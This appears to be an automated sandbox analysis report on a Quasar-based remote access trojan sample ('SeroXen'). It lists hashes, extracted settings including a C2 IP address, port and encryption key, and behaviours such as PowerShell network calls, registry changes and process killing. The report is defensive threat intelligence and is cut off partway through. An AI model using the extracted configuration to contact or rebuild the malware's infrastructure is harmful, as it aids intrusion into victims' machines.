Analysis
-
max time kernel
253s -
max time network
261s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
01-07-2024 16:44
Static task
static1
Behavioral task
behavioral1
Sample
SeroXen.rar
Resource
win10v2004-20240508-en
General
-
Target
SeroXen.rar
-
Size
7.4MB
-
MD5
3e5e034189b129f8ffd7b6ae57982740
-
SHA1
a099319659a4852ee87219d15bd04606660a9afa
-
SHA256
43b56573aa46b0a5c526e41ef58f0e902074181622a7b7508fa97c447b8afcc9
-
SHA512
578eec54ab0603ba4689590a181510e9aaf04bb3863f6283f19ff241f343ccd9cfbac8d35b7bcb65ece1d76122e0b808f90918ac468e3b4987717bd821c5b258
-
SSDEEP
196608:zSoEufZDDXsWegc13ygKrA8Uwsqew2k8ASGh/RHrw:zSoZDDXvcwrA8KkLB/hw
Malware Config
Extracted
quasar
15.5.0
SeroXen
147.185.221.20:49485
QSR_MUTEX_rzhQPLl57DqbMvbZp9
-
encryption_key
M2nw0PLpJxuyZQLyQ14p
-
install_name
Client.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1984-623-0x000001B5C7340000-0x000001B5C739E000-memory.dmp family_quasar -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 104 1984 powershell.exe 105 1984 powershell.exe 108 1984 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 5364 powershell.exe 5348 powershell.exe 4384 powershell.exe 1140 powershell.exe 4368 powershell.exe 1984 powershell.exe 556 powershell.exe 5160 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeSeroXen.exeSeroXen.exeWScript.exeSeroXen.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation SeroXen.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation SeroXen.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation SeroXen.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 8 IoCs
Processes:
7z2407-x64.exe7zG.exeSeroXen.exeSeroXen.exeSeroXen.exeSeroXen.exeSeroXen.exeSeroXen.exepid process 5652 7z2407-x64.exe 5676 7zG.exe 5840 SeroXen.exe 4124 SeroXen.exe 5272 SeroXen.exe 6088 SeroXen.exe 4036 SeroXen.exe 3028 SeroXen.exe -
Loads dropped DLL 2 IoCs
Processes:
Explorer.EXE7zG.exepid process 3524 Explorer.EXE 5676 7zG.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 103 ip-api.com -
Drops file in System32 directory 4 IoCs
Processes:
svchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\$phantom-RuntimeBroker_startup_199_str svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Drops file in Program Files directory 64 IoCs
Processes:
7z2407-x64.exedescription ioc process File opened for modification C:\Program Files\7-Zip\Lang\mn.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\th.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\en.ttt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ka.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ug.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\7z.sfx 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Uninstall.exe 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\et.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\fa.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\yo.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\License.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\7zG.exe 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\gu.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\is.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ja.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\hi.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sl.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\uz.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\fur.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\vi.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\eo.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\fi.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mk.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\tr.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ca.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\da.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\7-zip32.dll 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\7z.dll 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\fr.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sa.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-tw.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pt.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sk.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\kab.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sv.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\History.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\uz-cyrl.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\7z.exe 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\eu.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\hy.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\uk.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ro.txt 7z2407-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt 7z2407-x64.exe -
Drops file in Windows directory 2 IoCs
Processes:
SeroXen.exeSeroXen.exedescription ioc process File created C:\Windows\Uni.bat SeroXen.exe File opened for modification C:\Windows\Uni.bat SeroXen.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 3648 taskkill.exe 1388 taskkill.exe 1252 taskkill.exe -
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE -
Modifies data under HKEY_USERS 3 IoCs
Processes:
chrome.exesvchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133643259097367612" chrome.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 64 IoCs
Processes:
7z2407-x64.exeExplorer.EXEpowershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2407-x64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "4" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "5" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" 7z2407-x64.exe Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000adbc178a40a1da0144beeb9349a1da0121ff4806d6cbda0114000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\NodeSlot = "3" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 020000000100000000000000ffffffff Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip 7z2407-x64.exe Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e80922b16d365937a46956b92703aca08af0000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 7z2407-x64.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Documents" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656} Explorer.EXE -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 2616 NOTEPAD.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exepowershell.exepowershell.exepowershell.exepowershell.exeSeroXen.exepid process 4008 chrome.exe 4008 chrome.exe 5348 powershell.exe 5348 powershell.exe 5348 powershell.exe 1140 powershell.exe 1140 powershell.exe 1140 powershell.exe 4368 powershell.exe 4368 powershell.exe 4368 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 5272 SeroXen.exe 5272 SeroXen.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3524 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
chrome.exepid process 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
